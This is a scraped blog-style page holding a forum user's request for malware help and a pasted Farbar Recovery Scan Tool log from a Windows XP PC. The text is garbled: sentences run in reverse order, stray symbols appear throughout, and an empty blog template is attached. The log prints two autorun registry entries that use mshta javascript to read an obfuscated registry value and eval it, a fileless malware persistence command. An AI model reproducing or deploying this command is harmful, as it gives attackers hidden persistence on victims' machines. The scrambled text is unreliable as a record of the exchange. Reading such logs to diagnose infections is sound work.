] => mshta javascript:ib6PeiJi="uG" xL9=new%20ActiveXObject("WScript.Shell") d6tFXwX="yYk7Wt" Ect7G=xL9.RegRead("HKLM\\software\\963765da89\\c5a57312") Nwc9VwuRd6="H" eval(Ect7G) ZK1aFHC0="46or" C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation) HKLM\.\Policies\Explorer\Run: => mshta javascript:Kjhb8ByoG="HvydJ0f" uw77=new%20ActiveXObject("WScript.Shell") JMj6uFX8="Amz3l" tTr15Z=uw77.RegRead("HKLM\\software\\9b410264c2\\8432af9a") vvRH2awjR="hd3cYox" eval(tTr15Z) o8IaZJxr="r (the data entry has 6 more characters). HKLM\.\Run: => C:\Program Files\Common Files\AOL\ACS\AOLDial.exe (AOL LLC) HKLM\.\Run: => C:\Program Files\Common Files\AOL\1129293949\ee\AOLSoftware.exe (AOL LLC) HKLM\.\Run: => C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software) HKLM\.\Run: => C:\Program Files\Linksys\Linksys Wireless Manager\LinksysWirelessManager.exe (Linksys, LLC) HKLM\.\Run: => C:\Program Files\Common Files\Pure Networks Shared\Platform\nmctxth.exe (Cisco Systems, Inc.) HKLM\.\Run: => C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe (Alpha Networks Inc.) HKLM\.\Run: => C:\Program Files\D-Link\RangeBooster G WUA-2340\AirPlusCFG.exe (D-Link) HKLM\.\Run: => C:\Program Files\SBC Self Support Tool\SmartBridge\MotiveSB.exe (Motive, Inc.) HKLM\.\Run: => C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation) HKLM\.\Run: => C:\Program Files\Intel Audio Studio\IntelAudioStudio.exe (Intel Corporation) HKLM\.\Run: => C:\Program Files\Digital Media Reader\shwiconem.exe (Alcor Micro, Corp.) HKLM\.\Run: => C:\WINDOWS\SMINST\RECGUARD.EXE () (If an entry is included in the fixlist, the registry item will be restored to default or removed. (Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\WINDOWS\system32\cmd.exe (Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe (Akamai Technologies, Inc.) C:\Documents and Settings\Owner\Local Settings\Application Data\Akamai\netsession_win.exe (AOL LLC) C:\Program Files\Common Files\AOL\1129293949\ee\aolsoftware.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe ![]() (Linksys, LLC) C:\Program Files\Linksys\Linksys Wireless Manager\LinksysWirelessManager.exe (Cisco Systems, Inc.) C:\Program Files\Common Files\Pure Networks Shared\Platform\nmctxth.exe (Motive, Inc.) C:\PROGRA~1\SBCSEL~1\SMARTB~1\MotiveSB.exe (Intel Corporation) C:\WINDOWS\system32\igfxpers.exe (Intel Corporation) C:\WINDOWS\system32\hkcmd.exe (Intel Corporation) C:\Program Files\Intel Audio Studio\IntelAudioStudio.exe ![]() (Alcor Micro, Corp.) C:\Program Files\Digital Media Reader\shwiconEM.exe (Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe (Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe (Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe (Cisco Systems, Inc.) C:\Program Files\Common Files\Pure Networks Shared\Platform\nmsrvc.exe (New Boundary Technologies, Inc.) C:\Program Files\Common Files\New Boundary\PrismXL\PRISMXL.SYS (McAfee, Inc.) C:\PROGRA~1\McAfee\SITEAD~1\McSACore.exe (Microsoft Corporation) C:\WINDOWS\ehome\ehSched.exe (Microsoft Corporation) C:\WINDOWS\ehome\ehRecvr.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe ![]() ![]() (If an entry is included in the fixlist, the process will be closed. Internet Explorer Version 7 (Default browser: FF) Platform: Microsoft Windows XP Professional Service Pack 3 (X86) Language: English (United States) Loaded Profiles: Owner (Available Profiles: Owner & Administrator) Running from C:\Documents and Settings\Owner\Desktop Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:05-03-2016 01 Please look them over and let me know if I need to do anything further. I ran the tests recommended, Farbar and the results are listed below. He suggested I run some tests and come to this forum to try to see ifit is indeed a malware problem. GTG analyzer felt that the 34.85% CPU usage of dllhost.exe 32 COM Surrogate is most likely what is ramping up your temperatures. while trying to correct this problem, we found that one of the diodes is running extremely hot.Īfter running some tests, we found that there is a possibility of malware in one of the dll files. Hello, I have been talking with another section of the forum because of slowness in the computer.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |